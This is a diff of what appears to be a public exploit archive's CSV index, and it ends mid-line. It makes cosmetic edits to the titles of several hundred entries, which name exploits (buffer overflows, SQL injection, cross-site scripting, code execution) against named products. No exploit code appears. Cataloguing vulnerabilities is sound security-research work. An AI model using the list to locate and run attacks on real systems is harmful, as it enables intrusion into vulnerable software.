19269,platforms/irix/local/19269.txt,"SGI IRIX 6.0.1 colorview - Exploit",1995-02-09,"Dave Sill",irix,local,0 @@ -16678,12 +16679,12 @@ id,file,description,date,author,platform,type,port 19286,platforms/linux/local/19286.c,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (2)",1997-05-27,"Solar Designer",linux,local,0 19287,platforms/aix/local/19287.c,"IBM AIX 4.3 infod - Exploit",1998-11-21,"Repent Security Inc",aix,local,0 19288,platforms/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0 -19289,platforms/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - NULL Pointer Deference",2012-06-19,"Luigi Auriemma",windows,dos,0 +19289,platforms/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - NULL Pointer Dereference",2012-06-19,"Luigi Auriemma",windows,dos,0 19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 - Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0 19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Stack Buffer Overflow",2012-06-19,Metasploit,windows,remote,0 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilities",2012-06-19,Vulnerability-Lab,php,webapps,0 19293,platforms/windows/local/19293.py,"Sysax 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 -19294,platforms/php/webapps/19294.txt,"Wordpress Schreikasten 0.14.13 Plugin - Cross-Site Scripting",2012-06-20,"Henry Hoggard",php,webapps,0 +19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 Plugin - Cross-Site Scripting",2012-06-20,"Henry Hoggard",php,webapps,0 19295,platforms/windows/remote/19295.rb,"Adobe Flash Player - AVM Verification Logic Array Indexing Code Execution",2012-06-20,Metasploit,windows,remote,0 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",windows,remote,0 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",linux,local,0 @@ -16708,7 +16709,7 @@ id,file,description,date,author,platform,type,port 19315,platforms/linux/local/19315.c,"RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - klogd Buffer Overflow (2)",1999-02-26,"Esa Etelavuori",linux,local,0 19316,platforms/irix/remote/19316.c,"SGI IRIX 6.5.2 nsd - Exploit",1999-05-31,"Jefferson Ogata",irix,remote,0 19317,platforms/irix/local/19317.c,"SGI IRIX 5.3/6.2 ordist - Exploit",1997-05-24,"Yuri Volobuev",irix,local,0 -19318,platforms/aix/local/19318.c,"SGI IRIX 6.4 - permissions Buffer Overflow",1997-05-26,"David Hedley",aix,local,0 +19318,platforms/aix/local/19318.c,"SGI IRIX 6.4 - Permissions Buffer Overflow",1997-05-26,"David Hedley",aix,local,0 19319,platforms/irix/local/19319.c,"SGI IRIX 5.3 pkgadjust - Exploit",1996-09-23,"Hui-Hui Hu",irix,local,0 19411,platforms/bsd/local/19411.txt,"BSDI BSD/OS 4.0 /FreeBSD 3.2 /NetBSD 1.4 x86 / OpenBSD 2.5 - UFS Secure Level 1",1999-07-02,Stealth,bsd,local,0 19412,platforms/windows/local/19412.c,"Qbik WinGate 3.0 - Registry",1999-02-22,Chris,windows,local,0 @@ -16721,22 +16722,22 @@ id,file,description,date,author,platform,type,port 19324,platforms/php/webapps/19324.txt,"traq 2.3.5 - Multiple Vulnerabilities",2012-06-21,AkaStep,php,webapps,0 19325,platforms/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",php,webapps,0 19327,platforms/solaris/remote/19327.c,"Sun Solaris 2.5.1 - rpc.statd rpc Call Relaying",1999-06-07,anonymous,solaris,remote,0 -19328,platforms/windows/dos/19328.txt,"Qutecom Softphone 2.2.1 - Heap Overflow Denial of Service/Crash (PoC)",2012-06-22,"Debasish Mandal",windows,dos,0 +19328,platforms/windows/dos/19328.txt,"Qutecom SoftPhone 2.2.1 - Heap Overflow Denial of Service/Crash (PoC)",2012-06-22,"Debasish Mandal",windows,dos,0 19329,platforms/php/webapps/19329.txt,"agora project 2.13.1 - Multiple Vulnerabilities",2012-06-22,"Chris Russell",php,webapps,0 19330,platforms/php/webapps/19330.txt,"LimeSurvey 1.92+ build120620 - Multiple Vulnerabilities",2012-06-22,dun,php,webapps,0 -19331,platforms/windows/dos/19331.txt,"ACDSee PRO 5.1 - .RLE Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 -19332,platforms/windows/dos/19332.txt,"ACDSee PRO 5.1 - .PCT Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 -19333,platforms/windows/dos/19333.txt,"ACDSee PRO 5.1 - .gif Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 -19334,platforms/windows/dos/19334.txt,"ACDSee PRO 5.1 - .CUR Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 -19335,platforms/windows/dos/19335.txt,"XnView 1.98.8 - .gif Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 -19336,platforms/windows/dos/19336.txt,"XnView 1.98.8 - .PCT Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 -19337,platforms/windows/dos/19337.txt,"XnView 1.98.8 - .tiff Image Processing Heap Overflow (1)",2012-06-22,"Francis Provencher",windows,dos,0 -19338,platforms/windows/dos/19338.txt,"XnView 1.98.8 - .tiff Image Processing Heap Overflow (2)",2012-06-22,"Francis Provencher",windows,dos,0 +19331,platforms/windows/dos/19331.txt,"ACDSee PRO 5.1 - '.RLE' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 +19332,platforms/windows/dos/19332.txt,"ACDSee PRO 5.1 - '.PCT' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 +19333,platforms/windows/dos/19333.txt,"ACDSee PRO 5.1 - '.gif' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 +19334,platforms/windows/dos/19334.txt,"ACDSee PRO 5.1 - '.CUR' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 +19335,platforms/windows/dos/19335.txt,"XnView 1.98.8 - '.gif' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 +19336,platforms/windows/dos/19336.txt,"XnView 1.98.8 - '.PCT' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 +19337,platforms/windows/dos/19337.txt,"XnView 1.98.8 - '.tiff' Image Processing Heap Overflow (1)",2012-06-22,"Francis Provencher",windows,dos,0 +19338,platforms/windows/dos/19338.txt,"XnView 1.98.8 - '.tiff' Image Processing Heap Overflow (2)",2012-06-22,"Francis Provencher",windows,dos,0 19339,platforms/windows/webapps/19339.txt,"SoftPerfect Bandwidth Manager 2.9.10 - Authentication Bypass",2012-06-22,Gitsnik,windows,webapps,0 19340,platforms/windows/dos/19340.txt,"Lattice Diamond Programmer 1.4.2 - Buffer Overflow",2012-06-22,"Core Security",windows,dos,0 19341,platforms/solaris/local/19341.c,"Solaris 2.5.1 kcms - Buffer Overflow (1)",1998-12-24,"Cheez Whiz",solaris,local,0 19342,platforms/solaris/local/19342.c,"Solaris 2.5.1 kcms - Buffer Overflow (2)",1998-12-24,UNYUN,solaris,local,0 -19343,platforms/solaris/local/19343.c,"Solaris 2.5.1 - rsh socket descriptor",1997-06-19,"Alan Cox",solaris,local,0 +19343,platforms/solaris/local/19343.c,"Solaris 2.5.1 - rsh socket Descriptor",1997-06-19,"Alan Cox",solaris,local,0 19344,platforms/aix/local/19344.sh,"IBM AIX 3.2.5 - IFS",1994-04-02,anonymous,aix,local,0 19345,platforms/aix/local/19345.txt,"IBM AIX 4.2.1 lquerypv - Exploit",1996-11-24,Aleph1,aix,local,0 19346,platforms/freebsd/local/19346.c,"FreeBSD 3.1 / Solaris 2.6 - Domain Socket",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 @@ -16745,7 +16746,7 @@ id,file,description,date,author,platform,type,port 19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 rmail - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 19350,platforms/solaris/local/19350.sh,"Solaris 2.5.1 - License Manager",1998-10-21,"Joel Eriksson",solaris,local,0 19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 serial_ports - Exploit",1994-02-02,transit,irix,local,0 -19407,platforms/windows/remote/19407.py,"Symantec PcAnywhere 12.5.0 - Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0 +19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0 19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 suid_exec - Exploit",1996-12-02,"Yuri Volobuev",irix,local,0 19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp - Exploit",1996-12-02,anonymous,aix,local,0 19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 startmidi - Exploit",1997-02-09,"David Hedley",irix,local,0 @@ -16776,13 +16777,13 @@ id,file,description,date,author,platform,type,port 19380,platforms/multiple/dos/19380.txt,"Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",multiple,dos,0 19393,platforms/windows/dos/19393.py,"Able2Doc and Able2Doc Professional 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 - employer-profile.asp SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 -19398,platforms/php/webapps/19398.txt,"Wordpress Fancy Gallery Plugin 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 +19398,platforms/php/webapps/19398.txt,"WordPress Fancy Gallery Plugin 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 19408,platforms/php/webapps/19408.txt,"Zend Framework - Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 -19403,platforms/php/webapps/19403.rb,"SugarCRM 6.3.1 - unserialize() PHP Code Execution",2012-06-26,Metasploit,php,webapps,0 +19403,platforms/php/webapps/19403.rb,"SugarCRM 6.3.1 - Unserialize() PHP Code Execution",2012-06-26,Metasploit,php,webapps,0 29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service",2006-11-15,"Evgeny Legerov",windows,dos,0 19409,platforms/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 -19414,platforms/windows/dos/19414.c,"Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (2)",1999-07-03,klepto,windows,dos,0 -19415,platforms/windows/dos/19415.c,"Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (3)",1999-04-06,"Rob Mosher",windows,dos,0 +19414,platforms/windows/dos/19414.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (2)",1999-07-03,klepto,windows,dos,0 +19415,platforms/windows/dos/19415.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (3)",1999-04-06,"Rob Mosher",windows,dos,0 19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service",1999-07-06,"Arne Vidstrom",windows,dos,0 19417,platforms/osx/local/19417.txt,"Apple Mac OS 8 8.6 - Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0 19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 adb - Exploit",1999-07-12,"GZ Apple",aix,local,0 @@ -16818,7 +16819,7 @@ id,file,description,date,author,platform,type,port 19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow",1999-08-03,UNYUN,windows,remote,0 19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R - 'Topic' Buffer Overflow",1999-08-03,UNYUN,windows,remote,0 19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 - Buffer Overflow",1999-08-08,UNYUN,windows,remote,0 -19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98 a/98 b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,multiple,remote,0 +19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,multiple,remote,0 19452,platforms/php/webapps/19452.txt,"phpmoneybooks 1.03 - Persistent Cross-Site Scripting",2012-06-29,chap0,php,webapps,0 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local Denial of Service",2012-06-29,0in,windows,dos,0 19455,platforms/windows/webapps/19455.txt,"specview 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps,0 @@ -16828,18 +16829,18 @@ id,file,description,date,author,platform,type,port 19459,platforms/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Buffer Overflow",1999-08-13,"jduck and stranjer",multiple,remote,0 19460,platforms/multiple/local/19460.sh,"Oracle 8 8.1.5 - Intelligent Agent (1)",1999-08-16,"Brock Tellier",multiple,local,0 19461,platforms/multiple/local/19461.c,"Oracle 8 8.1.5 - Intelligent Agent (2)",1999-08-16,"Gilles PARC",multiple,local,0 -19462,platforms/windows/local/19462.c,"Microsoft Windows 95/98 IE5/Telnet - Heap Overflow",1999-08-16,"Jeremy Kothe",windows,local,0 +19462,platforms/windows/local/19462.c,"Microsoft Windows 95/98 Internet Explorer 5/Telnet - Heap Overflow",1999-08-16,"Jeremy Kothe",windows,local,0 19463,platforms/linux/dos/19463.c,"S.u.S.E. Linux 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service",1999-08-16,friedolin,linux,dos,0 19464,platforms/linux/local/19464.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 19465,platforms/linux/local/19465.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Exploit",1999-08-18,"Gregory Duchemin",multiple,remote,0 19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 - pt_chown",1999-08-23,"Michal Zalewski",linux,local,0 -19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5.0 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0 +19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0 19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (1)",1999-08-30,Akke,linux,local,0 19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (2)",1999-08-25,jbowie,linux,local,0 -19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5.0 - HTML Form Control Denial of Service",1999-08-27,"Neon Bunny",windows,dos,0 +19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5 - HTML Form Control Denial of Service",1999-08-27,"Neon Bunny",windows,dos,0 19472,platforms/windows/local/19472.txt,"IBM GINA for NT 1.0 - Privilege Escalation",1999-08-23,"Frank Pikelner",windows,local,0 -19473,platforms/windows/local/19473.txt,"Microsoft Internet Explorer 5.0 - FTP Password Storage",1999-08-25,"Makoto Shiotsuki",windows,local,0 +19473,platforms/windows/local/19473.txt,"Microsoft Internet Explorer 5 - FTP Password Storage",1999-08-25,"Makoto Shiotsuki",windows,local,0 19474,platforms/linux/local/19474.txt,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6.0 - Vixie Cron MAILTO Sendmail",1999-08-25,"Olaf Kirch",linux,local,0 19475,platforms/linux/remote/19475.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 19476,platforms/linux/remote/19476.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 @@ -16847,18 +16848,18 @@ id,file,description,date,author,platform,type,port 19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0 19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 19480,platforms/multiple/local/19480.c,"ISC INN 2.2 / RedHat Linux 6.0 - inews Buffer Overflow",1999-09-02,bawd,multiple,local,0 -19481,platforms/php/webapps/19481.txt,"Wordpress Paid Business Listings 1.0.2 Plugin - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0 -19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 - .FIT File Format Denial of Service",2012-06-30,"Joseph Sheridan",multiple,dos,0 -19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 +19481,platforms/php/webapps/19481.txt,"WordPress Paid Business Listings 1.0.2 Plugin - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0 +19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 - '.FIT' File Format Denial of Service",2012-06-30,"Joseph Sheridan",multiple,dos,0 +19483,platforms/windows/dos/19483.txt,"Irfanview JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow",2012-07-01,Metasploit,windows,remote,3817 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0 -19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0 +19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0 19488,platforms/bsd/dos/19488.c,"FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - setsockopt() Denial of Service",1999-09-05,"L. Sassaman",bsd,dos,0 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 - DCOM Server",1999-09-08,Mnemonix,windows,dos,0 -19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5.0 - Import/Export Favorites",1999-09-10,"Georgi Guninski",windows,remote,0 +19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5 - Import/Export Favorites",1999-09-10,"Georgi Guninski",windows,remote,0 19491,platforms/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 - HackerShield AgentAdmin Password",1999-09-10,anonymous,windows,remote,0 -19492,platforms/multiple/remote/19492.txt,"Microsoft Internet Explorer 5.0 / Netscape Communicator 4.0/4.5/4.6 - Javascript STYLE",1999-09-13,"Georgi Guninski",multiple,remote,0 +19492,platforms/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",multiple,remote,0 19493,platforms/multiple/remote/19493.txt,"Netscape Enterprise Server 3.51/3.6 SP2 - Accept Buffer Overflow",1999-09-13,"Nobuo Miwa",multiple,remote,0 19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 @@ -16881,7 +16882,7 @@ id,file,description,date,author,platform,type,port 19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0 / Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0 19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",hardware,dos,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 -19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 +19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/Windows NT 4) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS - ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 19793,platforms/php/webapps/19793.txt,"Magento eCommerce - Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 @@ -16890,12 +16891,12 @@ id,file,description,date,author,platform,type,port 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 19523,platforms/linux/local/19523.txt,"python-wrapper - Untrusted Search Path/Code Execution",2012-07-02,ShadowHatesYou,linux,local,0 -19524,platforms/php/webapps/19524.txt,"Wordpress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0 -19525,platforms/windows/webapps/19525.txt,"IIS - Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0 +19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0 +19525,platforms/windows/webapps/19525.txt,"Microsoft IIS - Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0 19526,platforms/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW - Directory Traversal (Metasploit)",2012-07-02,"Dillon Beresford",hardware,webapps,0 -19528,platforms/windows/local/19528.txt,"Microsoft Internet Explorer 4.1/5.0 - Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 +19528,platforms/windows/local/19528.txt,"Microsoft Internet Explorer 4.1/5 - Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19529,platforms/solaris/local/19529.c,"Solaris 7.0 /usr/bin/mail - '-m' Local Buffer Overflow",1999-09-12,"Brock Tellier",solaris,local,0 -19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5.0 - Download Behavior",1999-09-27,"Georgi Guninski",windows,remote,0 +19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5 - Download Behaviour",1999-09-27,"Georgi Guninski",windows,remote,0 19531,platforms/hardware/remote/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",hardware,remote,0 19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 ftpd - Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 19533,platforms/solaris/local/19533.c,"Solaris 7.0 ufsdump - Local Buffer Overflow (1)",1998-04-23,smm,solaris,local,0 @@ -16905,7 +16906,7 @@ id,file,description,date,author,platform,type,port 19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0 19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - IFRAME",1999-10-11,"Georgi Guninski",windows,remote,0 -19540,platforms/windows/remote/19540.txt,"t. hauck jana webserver 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote,0 +19540,platforms/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote,0 19541,platforms/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",novell,dos,0 19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' symlink",1999-10-11,"Brock Tellier",sco,local,0 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 - cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local,0 @@ -16924,21 +16925,21 @@ id,file,description,date,author,platform,type,port 19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0 19557,platforms/linux/remote/19557.txt,"John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon",1995-07-31,"Paul Phillips",linux,remote,0 19558,platforms/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow",1999-10-15,"Tymm Twillman",linux,remote,0 -19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 - Javascript URL Redirection",1999-10-18,"Georgi Guninski",windows,remote,0 +19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL redirection",1999-10-18,"Georgi Guninski",windows,remote,0 19560,platforms/multiple/remote/19560.c,"Washington University WU-FTPD 2.5.0 - message Buffer Overflow",1999-10-19,typo/teso,multiple,remote,0 19561,platforms/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x - Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",windows,remote,0 19562,platforms/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow",1999-09-30,"Per Bergehed",windows,dos,0 19563,platforms/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",windows,dos,0 19564,platforms/bsd/dos/19564.c,"Axent Raptor 6.0 - Denial of Service",1999-10-21,MSG.Net,bsd,dos,0 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools",1999-10-22,"Brock Tellier",linux,local,0 -19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPD 1.1/2.4 Pro - Buffer Overflow",1999-10-22,UNYUN,windows,remote,0 +19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPd 1.1/2.4 Pro - Buffer Overflow",1999-10-22,UNYUN,windows,remote,0 19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0 19568,platforms/windows/remote/19568.txt,"pacific software url live! 1.0 - Directory Traversal",1999-10-28,UNYUN,windows,remote,0 19569,platforms/windows/dos/19569.pl,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (1)",1999-10-28,"Alberto Soli",windows,dos,0 19570,platforms/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (2)",1999-11-04,"Alberto Solino",windows,remote,0 19571,platforms/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 - RCPT TO Denial of Service",1999-10-28,"Nobuo Miwa",multiple,dos,0 -19572,platforms/php/webapps/19572.txt,"Wordpress MoodThingy Widget 0.8.7 Plugin - Blind SQL Injection",2012-07-04,"Chris Kellum",php,webapps,0 -19573,platforms/php/webapps/19573.php,"Tiki Wiki CMS Groupware 8.3 - 'unserialize()' PHP Code Execution",2012-07-04,EgiX,php,webapps,0 +19572,platforms/php/webapps/19572.txt,"WordPress MoodThingy Widget 0.8.7 Plugin - Blind SQL Injection",2012-07-04,"Chris Kellum",php,webapps,0 +19573,platforms/php/webapps/19573.php,"Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution",2012-07-04,EgiX,php,webapps,0 19574,platforms/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",php,webapps,0 19575,platforms/windows/dos/19575.txt,".NET Framework - Tilde Character Denial of 